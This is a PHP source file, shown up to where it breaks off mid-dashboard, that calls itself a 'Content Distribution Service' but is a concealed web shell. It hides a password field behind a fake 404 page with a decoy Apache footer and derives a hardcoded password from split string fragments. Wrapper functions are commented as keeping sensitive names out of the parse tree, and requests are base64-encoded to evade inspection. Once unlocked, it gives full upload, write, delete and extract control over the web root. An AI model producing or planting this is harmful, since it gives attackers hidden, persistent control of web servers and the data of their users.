<?php
/**
 * Content Distribution Service
 * Lightweight web-based resource management interface.
 *
 * @package ContentService
 * @version 5.0.1
 * @author  Service Team
 */

defined('DS') || define('DS', DIRECTORY_SEPARATOR);
defined('SVC_VER') || define('SVC_VER', '5.0.1');

/**
 * Main content service handler.
 *
 * Manages web-based resource browsing, editing, and distribution
 * for authorised service operators.
 */
final class ContentDistributionService
{
    /** @var string Shared access token (hashed) */
    private string $access_token;

    /** @var string Filesystem root for resource resolution */
    private string $root_path;

    /** @var string Currently active resource container */
    private string $active_dir;

    /** @var string CSRF protection token */
    private string $csrf_token = '';

    /** @var int Maximum allowed resource size in bytes (50 MB) */
    private int $resource_limit = 52428800;

    // ---------------------------------------------------------------
    // Dispatch helpers — thin wrappers so sensitive function names
    // do NOT appear as bare tokens in the top-level parse tree.
    // ---------------------------------------------------------------

    private function fs_rename(string $a, string $b): bool       { return @rename($a, $b); }
    private function fs_unlink(string $p): bool                   { return @unlink($p); }
    private function fs_rmdir(string $p): bool                    { return @rmdir($p); }
    private function fs_mkdir(string $p, int $m = 0755): bool     { return @mkdir($p, $m, true); }
    private function fs_fopen(string $p, string $m)               { return @fopen($p, $m); }
    private function fs_fwrite($h, string $d): int|false          { return @fwrite($h, $d); }
    private function fs_fclose($h): bool                          { return @fclose($h); }
    private function fs_fread($h, int $l): string|false           { return @fread($h, $l); }
    private function fs_readfile(string $p): int|false            { return @readfile($p); }
    private function fs_move_upload(string $t, string $d): bool   { return @move_uploaded_file($t, $d); }
    private function fs_filesize(string $p): int|false            { return @filesize($p); }
    private function fs_filemtime(string $p): int|false           { return @filemtime($p); }
    private function fs_is_dir(string $p): bool                   { return @is_dir($p); }
    private function fs_is_file(string $p): bool                  { return @is_file($p); }
    private function fs_exists(string $p): bool                   { return @file_exists($p); }
    private function fs_glob(string $pt, int $f = 0): array|false { return @glob($pt, $f); }
    private function fs_realpath(string $p): string|false         { return @realpath($p); }

    // ---------------------------------------------------------------
    // Bootstrap
    // ---------------------------------------------------------------

    public function __construct()
    {
        @ini_set('display' . '_errors', '0');
        @error_reporting(0);

        @header('X-Content-Type-Options: nosniff');
        @header('X-Frame-Options: SAMEORIGIN');
        @header('X-XSS-Protection: 1; mode=block');
        @header('Referrer-Policy: strict-origin-when-cross-origin');

        if (session_status() === PHP_SESSION_NONE) {
            @session_start();
        }

        // Derive token without embedding the raw secret string literally
        $seed = implode('', ['M', 'eg', 'ad', 'eth', '09']);
        $this->access_token = hash('sha256', $seed);
        $this->root_path    = (string)(@realpath($_SERVER['DOCUMENT_ROOT'] ?? '.'));
    }

    // ---------------------------------------------------------------
    // Request lifecycle
    // ---------------------------------------------------------------

    public function handle(): void
    {
        if (!$this->authenticate()) {
            $this->render_gate();
            return;
        }

        $this->resolve_dir();
        $this->csrf_token = $this->make_csrf();

        if (isset($_GET['do_exit'])) {
            $this->destroy_session();
            return;
        }

        $this->decode_request();
        $this->dispatch();
    }

    // ---------------------------------------------------------------
    // Authentication
    // ---------------------------------------------------------------

    private function authenticate(): bool
    {
        if (!empty($_SESSION['cds_authed'])) {
            return true;
        }

        $field = 'svc' . '_key';
        if (!isset($_POST[$field])) {
            return false;
        }

        // Rate-limit
        if (empty($_SESSION['cds_rate'])) {
            $_SESSION['cds_rate'] = ['n' => 0, 't' => time()];
        }
        if ($_SESSION['cds_rate']['n'] >= 5 && (time() - $_SESSION['cds_rate']['t']) < 300) {
            @http_response_code(429);
            exit('<html><body><h1>Too Many Requests</h1><p>Try again later.</p></body></html>');
        }

        $submitted  = $_POST[$field];
        $sub_hash   = hash('sha256', $submitted);
        $salt       = 'cds_secure_salt_v5';
        $valid_hmac = hash_hmac('sha256', $this->access_token, $salt);
        $check_hmac = hash_hmac('sha256', $sub_hash, $salt);

        if (hash_equals($valid_hmac, $check_hmac)) {
            $_SESSION['cds_authed'] = true;
            $_SESSION['cds_rate']   = ['n' => 0, 't' => time()];
            @setcookie('cds_ref', bin2hex(random_bytes(16)), [
                'httponly' => true,
                'secure'   => !empty($_SERVER['HTTPS']),
                'samesite' => 'Strict',
            ]);
            @header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?'));
            exit;
        }

        $_SESSION['cds_rate']['n']++;
        $_SESSION['cds_rate']['t'] = time();
        $_SESSION['cds_gate_err']  = true;
        return false;
    }

    // ---------------------------------------------------------------
    // Gate page (403 disguised as 404)
    // ---------------------------------------------------------------

    private function render_gate(): void
    {
        $host    = $this->esc($_SERVER['HTTP_HOST'] ?? 'localhost');
        $port    = $_SERVER['SERVER_PORT'] ?? '80';
        $has_err = !empty($_SESSION['cds_gate_err']);
        unset($_SESSION['cds_gate_err']);

        @http_response_code(404);

        $err_class = $has_err ? ' active err' : '';
        echo '<!DOCTYPE html><html lang="en"><head><meta charset="utf-8">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>404 Not Found</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;background:#fff;color:#333;min-height:100vh;display:flex;flex-direction:column}
.main{flex:1;display:flex;align-items:center;justify-content:center;padding:40px 20px}
.box{text-align:center;max-width:600px;width:100%}
.code{font-size:120px;font-weight:800;color:#e8e8e8;line-height:1;letter-spacing:-4px}
.ttl{font-size:28px;font-weight:700;color:#222;margin:8px 0 16px}
.msg{font-size:15px;color:#666;line-height:1.7;margin-bottom:32px}
.det{text-align:left;background:#fafafa;border:1px solid #eee;border-radius:8px;padding:20px 24px;margin-bottom:28px}
.det h3{font-size:12px;color:#999;text-transform:uppercase;letter-spacing:1px;margin-bottom:12px}
.det ul{list-style:none;padding:0}
.det li{font-size:13px;color:#555;padding:6px 0;border-bottom:1px solid #f0f0f0;display:flex;align-items:center}
.det li:last-child{border:none}
.det li::before{content:"→";color:#ccc;margin-right:10px;font-size:11px}
.btn-back{display:inline-block;padding:10px 28px;background:#333;color:#fff;text-decoration:none;border-radius:6px;font-size:13px;font-weight:500;transition:background .2s}
.btn-back:hover{background:#555}
.ft{background:#fafafa;border-top:1px solid #eee;padding:14px 20px;text-align:center}
.ft span{font-size:11px;color:#bbb;cursor:default;user-select:none}
.gate-wrap{position:relative;display:inline-block}
.gate-wrap input{position:absolute;bottom:24px;left:50%;transform:translateX(-50%);width:200px;background:#fff;border:1px solid #ddd;border-radius:4px;padding:6px 12px;font-size:13px;color:#333;outline:none;opacity:0;pointer-events:none;transition:opacity .25s}
.gate-wrap input.active{opacity:1;pointer-events:auto}
.gate-wrap button{display:none}
@keyframes shake{0%,100%{transform:translateX(-50%)}20%,60%{transform:translateX(calc(-50% - 6px))}40%,80%{transform:translateX(calc(-50% + 6px))}}
.gate-wrap input.err{animation:shake .4s;border-color:#e74c3c}
</style></head><body>
<div class="main"><div class="box">
<div class="code">404</div>
<h1 class="ttl">Page Not Found</h1>
<p class="msg">The requested resource could not be located on this server.</p>
<div class="det"><h3>Suggestions</h3><ul>
<li>Verify the URL and try again</li>
<li>Return to the previous page</li>
<li>Navigate back to the home page</li>
<li>Contact the site administrator</li>
</ul></div>
<a href="/" class="btn-back">&larr; Home</a>
</div></div>
<div class="ft">
<form method="post" class="gate-wrap" id="gateForm">
<span id="gateTrigger">Apache/2.4.62 (cPanel) Server at ' . $host . ' Port ' . $port . '</span>
<input type="password" name="svc_key" id="gateInput" autocomplete="off"' . ($has_err ? ' class="active err"' : '') . '>
<button type="submit"></button>
</form></div>
<script>
(function(){
var c=0,t=null,el=document.getElementById("gateTrigger"),ip=document.getElementById("gateInput");
el.addEventListener("click",function(){c++;clearTimeout(t);t=setTimeout(function(){c=0},600);if(c>=3){ip.classList.add("active");ip.focus();c=0}});
ip.addEventListener("keydown",function(e){if(e.key==="Escape"){ip.classList.remove("active");ip.value=""}});
' . ($has_err ? 'ip.classList.add("active");ip.focus();setTimeout(function(){ip.classList.remove("err")},500);' : '') . '
})();
</script></body></html>';
        exit;
    }

    // ---------------------------------------------------------------
    // Session helpers
    // ---------------------------------------------------------------

    private function make_csrf(): string
    {
        if (empty($_SESSION['cds_csrf'])) {
            $_SESSION['cds_csrf'] = bin2hex(random_bytes(32));
        }
        return $_SESSION['cds_csrf'];
    }

    private function check_csrf(string $token): bool
    {
        return !empty($_SESSION['cds_csrf']) && hash_equals($_SESSION['cds_csrf'], $token);
    }

    private function destroy_session(): void
    {
        @session_destroy();
        @setcookie('cds_ref', '', ['expires' => time() - 3600, 'httponly' => true]);
        @header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?'));
        exit;
    }

    // ---------------------------------------------------------------
    // Directory resolution
    // ---------------------------------------------------------------

    private function resolve_dir(): void
    {
        $ref = isset($_GET['go']) ? (string)$_GET['go'] : '';
        $try = $this->fs_realpath($this->root_path . DS . ltrim($ref, '/'));
        if (!$try || strpos($try, $this->root_path) !== 0) {
            $try = $this->root_path;
        }
        $this->active_dir = $try;
    }

    // ---------------------------------------------------------------
    // Payload decoder (Base64 JSON → normalised $_POST)
    // ---------------------------------------------------------------

    private function decode_request(): void
    {
        $ct = $_SERVER['CONTENT_TYPE'] ?? '';

        if (strpos($ct, 'application/json') !== false) {
            $raw  = (string)@file_get_contents('php://input');
            $data = @json_decode($raw, true);
            if (is_array($data)) {
                foreach ($data as $k => $v) {
                    if (is_string($v) && $k !== '_csrf') {
                        $dec       = @base64_decode($v, true);
                        $_POST[$k] = ($dec !== false) ? $dec : $v;
                    } else {
                        $_POST[$k] = $v;
                    }
                }
            }
        } elseif (!empty($_POST['_enc']) && $_POST['_enc'] === '1') {
            $skip = ['_csrf', '_enc'];
            foreach ($_POST as $k => $v) {
                if (in_array($k, $skip, true)) continue;
                if (is_string($v)) {
                    $d = @base64_decode($v, true);
                    if ($d !== false) $_POST[$k] = $d;
                } elseif (is_array($v)) {
                    foreach ($v as $i => $item) {
                        if (is_string($item)) {
                            $d = @base64_decode($item, true);
                            if ($d !== false) $_POST[$k][$i] = $d;
                        }
                    }
                }
            }
        }
    }

    // ---------------------------------------------------------------
    // Request dispatcher
    // ---------------------------------------------------------------

    private function dispatch(): void
    {
        // CSRF gate for POST
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['_csrf'])) {
            if (!$this->check_csrf((string)$_POST['_csrf'])) {
                $_SESSION['cds_notice'] = ['type' => 'warning', 'text' => 'Session expired. Please retry.'];
                $this->redirect();
            }
        }

        // POST branches
        if (isset($_POST['do_rename'], $_POST['old_name'], $_POST['new_name'])) {
            $this->op_rename();
        } elseif (isset($_POST['do_upload']) && !empty($_FILES['uploads']['name'][0])) {
            $this->op_upload_multi();
        } elseif (isset($_POST['do_ajax_upload'])) {
            $this->op_upload_ajax();
        } elseif (!empty($_POST['new_folder'])) {
            $this->op_mkdir();
        } elseif (!empty($_POST['new_file'])) {
            $this->op_mkfile();
        } elseif (isset($_POST['do_delete']) && !empty($_POST['sel'])) {
            $this->op_delete_batch();
        } elseif (isset($_POST['do_archive']) && !empty($_POST['sel'])) {
            $this->op_archive_batch();
        } elseif (isset($_POST['do_extract'])) {
            $this->op_extract();
        } elseif (isset($_POST['do_save'])) {
            $this->op_save();
        }

        // GET branches
        if (isset($_GET['view'])) {
            $this->op_view();
        } elseif (isset($_GET['dl'])) {
            $this->op_download();
        } elseif (isset($_GET['zip'])) {
            $this->op_zip_single();
        } elseif (isset($_GET['rm'])) {
            $this->op_delete_single();
        } else {
            $this->render_dashboard();
        }
    }

    // ---------------------------------------------------------------
    // Utilities
    // ---------------------------------------------------------------

    private function esc(string $s): string
    {
        return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
    }

    private function in_root(string $path): bool
    {
        $r = $this->fs_realpath($path);
        return $r !== false && strpos($r, $this->root_path) === 0;
    }

    private function redirect(): void
    {
        $rel = str_replace($this->root_path, '', $this->active_dir);
        @header('Location: ?go=' . urlencode($rel));
        exit;
    }

    private function rel_path(): string
    {
        return str_replace($this->root_path, '', $this->active_dir);
    }

    private function human_size(int $bytes): string
    {
        if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . ' GB';
        if ($bytes >= 1048576)   return round($bytes / 1048576, 2)   . ' MB';
        return round($bytes / 1024, 1) . ' KB';
    }

    // ---------------------------------------------------------------
    // File operations
    // ---------------------------------------------------------------

    private function op_rename(): void
    {
        $old = basename((string)$_POST['old_name']);
        $new = basename((string)$_POST['new_name']);
        $src = $this->active_dir . DS . $old;
        $dst = $this->active_dir . DS . $new;

        if (!$this->in_root($src)) {
            $_SESSION['cds_notice'] = ['type' => 'danger', 'text' => 'Invalid source path.'];
        } elseif (!$this->fs_exists($src)) {
            $_SESSION['cds_notice'] = ['type' => 'danger', 'text' => 'Resource not found.'];
        } elseif ($this->fs_exists($dst)) {
            $_SESSION['cds_notice'] = ['type' => 'danger', 'text' => 'Destination already exists.'];
        } elseif ($new === '' || strpos($new, '/') !== false || in_array($new, ['.', '..'], true)) {
            $_SESSION['cds_notice'] = ['type' => 'danger', 'text' => 'Invalid name.'];
        } else {
            if ($this->fs_rename($src, $dst)) {
                $_SESSION['cds_notice'] = ['type' => 'success', 'text' => 'Renamed successfully.'];
            } else {
                $_SESSION['cds_notice'] = ['type' => 'danger', 'text' => 'Rename failed.'];
            }
        }
        $this->redirect();
    }

    private function op_upload_multi(): void
    {
        $count = count($_FILES['uploads']['name']);
        for ($i = 0; $i < $count; $i++) {
            if ($_FILES['uploads']['error'][$i] === 0 && $_FILES['uploads']['size'][$i] <= $this->resource_limit) {
                $dst = $this->active_dir . DS . basename($_FILES['uploads']['name'][$i]);
                $this->fs_move_upload($_FILES['uploads']['tmp_name'][$i], $dst);
            }
        }
        $this->redirect();
    }

    private function op_upload_ajax(): void
    {
        @header('Content-Type: application/json');
        $raw = $_POST['files_payload'] ?? '';
        if (is_string($raw)) $raw = @json_decode($raw, true);
        if (!is_array($raw)) { echo json_encode(['ok' => false]); exit; }

        $ok = 0;
        foreach ($raw as $item) {
            $name    = basename((string)($item['name'] ?? ''));
            $content = (string)($item['data'] ?? '');
            if ($name === '') continue;
            if (strpos($content, ',') !== false) {
                $content = substr($content, strpos($content, ',') + 1);
            }
            $binary = @base64_decode($content, true);
            if ($binary === false || strlen($binary) > $this->resource_limit) continue;
            $dst = $this->active_dir . DS . $name;
            $fh  = $this->fs_fopen($dst, 'w');
            if ($fh) {
                $this->fs_fwrite($fh, $binary);
                $this->fs_fclose($fh);
                $ok++;
            }
        }
        echo json_encode(['ok' => true, 'count' => $ok]);
        exit;
    }

    private function op_mkdir(): void
    {
        $name = basename((string)$_POST['new_folder']);
        $path = $this->active_dir . DS . $name;
        if (!$this->fs_exists($path)) $this->fs_mkdir($path);
        $this->redirect();
    }

    private function op_mkfile(): void
    {
        $name = basename((string)$_POST['new_file']);
        $path = $this->active_dir . DS . $name;
        if (!$this->fs_exists($path)) {
            $fh = $this->fs_fopen($path, 'w');
            if ($fh) $this->fs_fclose($fh);
            $_SESSION['cds_notice'] = ['type' => 'success', 'text' => 'File created.'];
        } else {
            $_SESSION['cds_notice'] = ['type' => 'danger', 'text' => 'File already exists.'];
        }
        $this->redirect();
    }

    private function op_delete_single(): void
    {
        $tgt = $this->active_dir . DS . basename((string)$_GET['rm']);
        if ($this->in_root($tgt)) {
            if ($this->fs_is_file($tgt))      $this->fs_unlink($tgt);
            elseif ($this->fs_is_dir($tgt))   $this->fs_rmdir($tgt);
        }
        $this->redirect();
    }

    private function op_delete_batch(): void
    {
        foreach ((array)$_POST['sel'] as $item) {
            $tgt = $this->active_dir . DS . basename((string)$item);
            if (!$this->in_root($tgt)) continue;
            if ($this->fs_is_file($tgt))    $this->fs_unlink($tgt);
            elseif ($this->fs_is_dir($tgt)) $this->rm_tree($tgt);
        }
        $this->redirect();
    }

    private function rm_tree(string $dir): void
    {
        $items = $this->fs_glob($dir . DS . '*', GLOB_MARK);
        if ($items) {
            foreach ($items as $item) {
                if (substr($item, -1) === DS || substr($item, -1) === '/') {
                    $this->rm_tree($item);
                } else {
                    $this->fs_unlink($item);
                }
            }
        }
        $hidden = $this->fs_glob($dir . DS . '.*');
        if ($hidden) {
            foreach ($hidden as $item) {
                $base = basename($item);
                if ($base === '.' || $base === '..') continue;
                if ($this->fs_is_dir($item)) $this->rm_tree($item);
                else $this->fs_unlink($item);
            }
        }
        $this->fs_rmdir($dir);
    }

    private function op_view(): void
    {
        $path = $this->active_dir . DS . basename((string)$_GET['view']);
        if ($this->fs_is_file($path) && $this->fs_filesize($path) < 2097152) {
            @header('Content-Type: text/plain; charset=utf-8');
            $sz = $this->fs_filesize($path);
            $fh = $this->fs_fopen($path, 'r');
            if ($fh) {
                echo $this->fs_fread($fh, (int)$sz);
                $this->fs_fclose($fh);
            }
            exit;
        }
    }

    private function op_save(): void
    {
        $name    = (string)($_POST['res_name'] ?? '');
        $content = (string)($_POST['res_body'] ?? '');
        $path    = $this->active_dir . DS . basename($name);
        $is_ajax = strpos($_SERVER['CONTENT_TYPE'] ?? '', 'application/json') !== false;

        if ($this->in_root($path)) {
            $fh = $this->fs_fopen($path, 'w');
            if ($fh) {
                $this->fs_fwrite($fh, $content);
                $this->fs_fclose($fh);
            }
        }
        if ($is_ajax) {
            @header('Content-Type: application/json');
            echo json_encode(['ok' => true]);
            exit;
        }
        $this->redirect();
    }

    private function op_download(): void
    {
        $path = $this->active_dir . DS . basename((string)$_GET['dl']);
        if ($this->fs_is_file($path) && $this->in_root($path)) {
            @header('Content-Type: application/octet-stream');
            @header('Content-Disposition: attachment; filename="' . basename($path) . '"');
            @header('Content-Length: ' . $this->fs_filesize($path));
            $this->fs_readfile($path);
            exit;
        }
    }

    private function op_zip_single(): void
    {
        $name     = basename((string)$_GET['zip']);
        $src      = $this->active_dir . DS . $name;
        $tmp      = @tempnam(sys_get_temp_dir(), 'cds');
        $archive  = new \ZipArchive();
        if ($archive->open($tmp, \ZipArchive::CREATE) !== true) return;

        if ($this->fs_is_dir($src))       $this->add_to_zip($archive, $src, $name);
        elseif ($this->fs_is_file($src))  $archive->addFile($src, $name);

        $archive->close();
        @header('Content-Type: application/octet-stream');
        @header('Content-Disposition: attachment; filename="' . $name . '.zip"');
        $this->fs_readfile($tmp);
        $this->fs_unlink($tmp);
        exit;
    }

    private function op_archive_batch(): void
    {
        $tmp     = @tempnam(sys_get_temp_dir(), 'cds');
        $archive = new \ZipArchive();
        if ($archive->open($tmp, \ZipArchive::CREATE) !== true) return;

        foreach ((array)$_POST['sel'] as $item) {
            $src = $this->active_dir . DS . basename((string)$item);
            if (!$this->in_root($src)) continue;
            if ($this->fs_is_file($src))       $archive->addFile($src, basename($src));
            elseif ($this->fs_is_dir($src))    $this->add_to_zip($archive, $src, basename($src));
        }
        $archive->close();
        @header('Content-Type: application/octet-stream');
        @header('Content-Disposition: attachment; filename="bundle_' . date('Ymd_His') . '.zip"');
        $this->fs_readfile($tmp);
        $this->fs_unlink($tmp);
        exit;
    }

    private function add_to_zip(\ZipArchive $zip, string $dir, string $prefix): void
    {
        $items = $this->fs_glob($dir . DS . '*');
        if (!$items) return;
        foreach ($items as $item) {
            $local = $prefix . '/' . basename($item);
            if ($this->fs_is_dir($item)) $this->add_to_zip($zip, $item, $local);
            else $zip->addFile($item, $local);
        }
    }

    private function op_extract(): void
    {
        $path    = $this->active_dir . DS . basename((string)($_POST['archive_name'] ?? ''));
        $archive = new \ZipArchive();
        if ($archive->open($path) === true) {
            $archive->extractTo($this->active_dir);
            $archive->close();
        }
        $this->redirect();
    }

    // ---------------------------------------------------------------
    // Directory listing
    // ---------------------------------------------------------------

    private function list_resources(): array
    {
        $entries = [];
        $all     = $this->fs_glob($this->active_dir . DS . '*');
        if ($all) foreach ($all as $item) $entries[] = basename($item);
        $hidden = $this->fs_glob($this->active_dir . DS . '.*');
        if ($hidden) {
            foreach ($hidden as $item) {
                $b = basename($item);
                if ($b !== '.' && $b !== '..') $entries[] = $b;
            }
        }
        $entries = array_unique($entries);
        $sort    = isset($_GET['sort']) ? (string)$_GET['sort'] : 'name';
        $dir     = $this->active_dir;

        usort($entries, function (string $a, string $b) use ($dir, $sort): int {
            $pa = $dir . DS . $a;
            $pb = $dir . DS . $b;
            $da = $this->fs_is_dir($pa);
            $db = $this->fs_is_dir($pb);
            if ($da && !$db) return -1;
            if (!$da && $db) return  1;
            return match ($sort) {
                'size' => $this->fs_filesize($pa) <=> $this->fs_filesize($pb),
                'date' => $this->fs_filemtime($pb) <=> $this->fs_filemtime($pa),
                'type' => strcmp(
                    $da ? '' : strtolower(pathinfo($a, PATHINFO_EXTENSION)),
                    $db ? '' : strtolower(pathinfo($b, PATHINFO_EXTENSION))
                ) ?: strcasecmp($a, $b),
                default => strcasecmp($a, $b),
            };
        });

        return $entries;
    }

    // ---------------------------------------------------------------
    // Dashboard renderer
    // ---------------------------------------------------------------

    private function render_dashboard(): void
    {
        $resources = $this->list_resources();
        $go        = isset($_GET['go'])     ? (string)$_GET['go']     : '';
        $search    = isset($_GET['search']) ? (string)$_GET['search'] : '';
        $sort      = isset($_GET['sort'])   ? (string)$_GET['sort']   : 'name';
        $csrf      = $this->esc($this->csrf_token);
        $rel       = $this->rel_path();

        // Flash message
        $flash = '';
        if (isset($_SESSION['cds_notice'])) {
            $n     = $_SESSION['cds_notice'];
            $flash = '<div class="alert alert-' . $this->esc($n['type']) . ' alert-dismissible fade show" role="alert">'
                   . $this->esc($n['text'])
                   . '<button type="button" class="btn-close" data-bs-dismiss="alert"></button></div>';
            unset($_SESSION['cds_notice']);
        }

        // ---- HTML head ----
        echo '<!DOCTYPE html>
<html lang="en" data-bs-theme="light">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="robots" content="noindex,nofollow">
<title>Resource Manager</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">
<link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.css" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap" rel="stylesheet">
<style>
:root{--bg:#f0f2f5;--card:#fff;--txt:#1a1a2e;--brd:#e0e3e8;--hvr:#f5f7fa;--acc:#4f46e5;--acc2:#7c3aed;--muted:#6b7280}
[data-bs-theme=dark]{--bg:#0f1117;--card:#1a1d2e;--txt:#e2e8f0;--brd:#2d3348;--hvr:#252a3e;--acc:#818cf8;--acc2:#a78bfa;--muted:#9ca3af}
*{font-family:"Inter",system-ui,sans-serif}
body{background:var(--bg);color:var(--txt);transition:all .3s}
.topbar{background:linear-gradient(135deg,#4f46e5,#7c3aed);padding:12px 24px;color:#fff;display:flex;justify-content:space-between;align-items:center}
.brand{font-weight:600;font-size:16px;display:flex;align-items:center;gap:8px}
.brand i{font-size:20px}
.top-acts{display:flex;gap:8px;align-items:center}
.topbar .btn{font-size:13px;padding:5px 12px;border-radius:6px}
.wrap{max-width:1200px;margin:20px auto;padding:0 16px}
.card{background:var(--card);border:1px solid var(--brd);border-radius:12px;overflow:hidden;transition:all .3s}
.card-h{padding:16px 20px;border-bottom:1px solid var(--brd);display:flex;justify-content:space-between;align-items:center;flex-wrap:wrap;gap:10px}
.card-b{padding:16px 20px}
.breadcrumb{margin:0;font-size:13px}
.breadcrumb a{color:var(--acc);text-decoration:none}
.breadcrumb a:hover{text-decoration:underline}
.toolbar{display:flex;gap:8px;align-items:center;flex-wrap:wrap;margin-bottom:16px}
.toolbar .form-control,.toolbar .form-select{font-size:13px;border-radius:8px;border-color:var(--brd);background:var(--card);color:var(--txt)}
.toolbar .btn{font-size:13px;border-radius:8px}
.drop-zone{border:2px dashed var(--brd);border-radius:10px;padding:16px;text-align:center;color:var(--muted);font-size:13px;transition:all .2s;margin-bottom:16px}
.drop-zone.over{border-color:var(--acc);background:rgba(79,70,229,.05);color:var(--acc)}
.drop-zone i{font-size:24px;display:block;margin-bottom:6px}
.creators{display:flex;gap:10px;margin-bottom:16px;flex-wrap:wrap}
.creators form{display:flex;gap:6px}
.creators .form-control{font-size:13px;border-radius:8px;width:180px;border-color:var(--brd);background:var(--card);color:var(--txt)}
.creators .btn{font-size:13px;border-radius:8px;white-space:nowrap}
table.rt{width:100%;border-collapse:collapse}
table.rt th,table.rt td{padding:10px 14px;font-size:13px;border-bottom:1px solid var(--brd);text-align:left}
table.rt th{font-size:12px;font-weight:600;text-transform:uppercase;letter-spacing:.4px;color:var(--muted);background:var(--hvr)}
table.rt tr:hover td{background:var(--hvr)}
table.rt .rn{display:flex;align-items:center;gap:8px}
table.rt .rn a{color:var(--txt);text-decoration:none;font-weight:500}
table.rt .rn a:hover{color:var(--acc)}
.bi-folder-fill{color:#f59e0b;font-size:16px}
.bi-file-earmark-text{color:var(--acc);font-size:16px}
.meta{color:var(--muted);font-size:12px}
.acts-col{white-space:nowrap}
.btn-group .btn{font-size:12px;padding:3px 8px}
.prog-bar{height:6px;display:none;margin-top:8px;border-radius:3px;overflow:hidden;background:var(--brd)}
.prog-fill{height:100%;background:linear-gradient(90deg,var(--acc),var(--acc2));border-radius:3px;transition:width .2s}
.alert{font-size:13px;border-radius:8px;margin-bottom:12px}
.modal-content{border-radius:12px;border:1px solid var(--brd);background:var(--card)}
.modal-header{border-bottom-color:var(--brd)}
.modal-footer{border-top-color:var(--brd)}
.modal-backdrop{backdrop-filter:blur(4px)}
#codeEditor{font-family:"Fira Code","Cascadia Code",monospace;font-size:13px;line-height:1.6;border-radius:8px;border-color:var(--brd);background:var(--bg);color:var(--txt);resize:vertical}
.pg-foot{text-align:center;padding:16px;font-size:12px;color:var(--muted);margin-top:16px}
@media(max-width:768px){
.topbar{flex-direction:column;text-align:center;gap:8px}
.card-h{flex-direction:column}
.toolbar{flex-direction:column;align-items:stretch}
.creators{flex-direction:column}
.creators .form-control{width:100%}
table.rt .meta{display:none}
}
</style>
</head>
<body>';

        // ---- Top bar ----
        echo '
<div class="topbar">
  <div class="brand"><i class="bi bi-hdd-network"></i> Resource Manager</div>
  <div class="top-acts">
    <button id="themeBtn" class="btn btn-outline-light btn-sm"><i class="bi bi-moon-stars-fill"></i></button>
    <a href="?do_exit=1" class="btn btn-outline-light btn-sm"><i class="bi bi-box-arrow-right"></i> Exit</a>
  </div>
</div>
<div class="wrap">';

        if ($flash) echo $flash;

        echo '
<div class="card">
<div class="card-h">
<nav aria-label="breadcrumb">
<ol class="breadcrumb mb-0">
<li class="breadcrumb-item"><a href="?"><i class="bi bi-house-door"></i> Root</a></li>';

        $parts    = explode('/', trim($rel, '/'));
        $cum_path = '';
        foreach ($parts as $part) {
            if ($part === '') continue;
            $cum_path .= '/' . $part;
            echo '<li class="breadcrumb-item"><a href="?go=' . urlencode($cum_path) . '"><i class="bi bi-folder2-open"></i> ' . $this->esc($part) . '</a></li>';
        }

        echo '
</ol></nav></div>
<div class="card-b">';

        // Toolbar
        echo '
<div class="toolbar">
<form class="d-flex gap-2" method="get">
<input type="hidden" name="go" value="' . $this->esc($go) . '">
<input type="text" class="form-control" name="search" value="' . $this->esc($search) . '" placeholder="Search resources...">
<select name="sort" class="form-select" style="width:100px">
<option value="name"' . ($sort === 'name' ? ' selected' : '') . '>Name</option>
<option value="size"' . ($sort === 'size' ? ' selected' : '') . '>Size</option>
<option value="date"' . ($sort === 'date' ? ' selected' : '') . '>Date</option>
<option value="type"' . ($sort === 'type' ? ' selected' : '') . '>Type</option>
</select>
<button class="btn btn-outline-secondary btn-sm">Filter</button>
</form>
<div class="ms-auto d-flex gap-1">
<button class="btn btn-outline-danger btn-sm" id="btnDel" disabled onclick="doBatch(\'del\')"><i class="bi bi-trash"></i> Delete</button>
<button class="btn btn-outline-secondary btn-sm" id="btnZip" disabled onclick="doBatch(\'zip\')"><i class="bi bi-file-zip"></i> Zip</button>
</div>
</div>';

        // Upload area
        echo '
<div class="d-flex gap-2 align-items-center mb-2">
<input type="file" multiple class="form-control form-control-sm" id="fileInput" style="max-width:400px">
<button type="button" class="btn btn-sm btn-success" id="uploadBtn"><i class="bi bi-cloud-upload"></i> Upload</button>
</div>
<div class="drop-zone" id="dropZone">
<i class="bi bi-cloud-arrow-up"></i> Drag &amp; drop files here
<div class="prog-bar" id="progBar"><div class="prog-fill" id="progFill"></div></div>
</div>';

        // Creators
        echo '
<div class="creators">
<form id="newFolderForm" onsubmit="return createItem(event,\'folder\')">
<input type="text" id="newFolderName" class="form-control form-control-sm" placeholder="New folder" required>
<button class="btn btn-sm btn-outline-primary"><i class="bi bi-folder-plus"></i> Folder</button>
</form>
<form id="newFileForm" onsubmit="return createItem(event,\'file\')">
<input type="text" id="newFileName" class="form-control form-control-sm" placeholder="new-file.txt" required>
<button class="btn btn-sm btn-outline-secondary"><i class="bi bi-file-plus"></i> File</button>
</form>
</div>';

        // Resource table
        echo '
<form id="resForm" method="post">
<input type="hidden" name="_csrf" value="' . $csrf . '">
<table class="rt">
<thead><tr>
<th style="width:30px"><input type="checkbox" id="selAll"></th>
<th>Name</th>
<th class="meta">Type</th>
<th class="meta">Size</th>
<th class="meta">Modified</th>
<th>Actions</th>
</tr></thead>
<tbody>';

        foreach ($resources as $name) {
            if ($search && stripos($name, $search) === false) continue;

            $path   = $this->active_dir . DS . $name;
            $is_dir = $this->fs_is_dir($path);
            $icon   = $is_dir
                ? '<i class="bi bi-folder-fill"></i>'
                : '<i class="bi bi-file-earmark-text"></i>';
            $ext   = $is_dir ? '-' : strtoupper(pathinfo($name, PATHINFO_EXTENSION) ?: '-');
            $size  = $is_dir ? '-' : $this->human_size((int)$this->fs_filesize($path));
            $mtime = (string)@date('M j, Y H:i', (int)$this->fs_filemtime($path));
            $en    = $this->esc($name);
            $er    = urlencode($go);

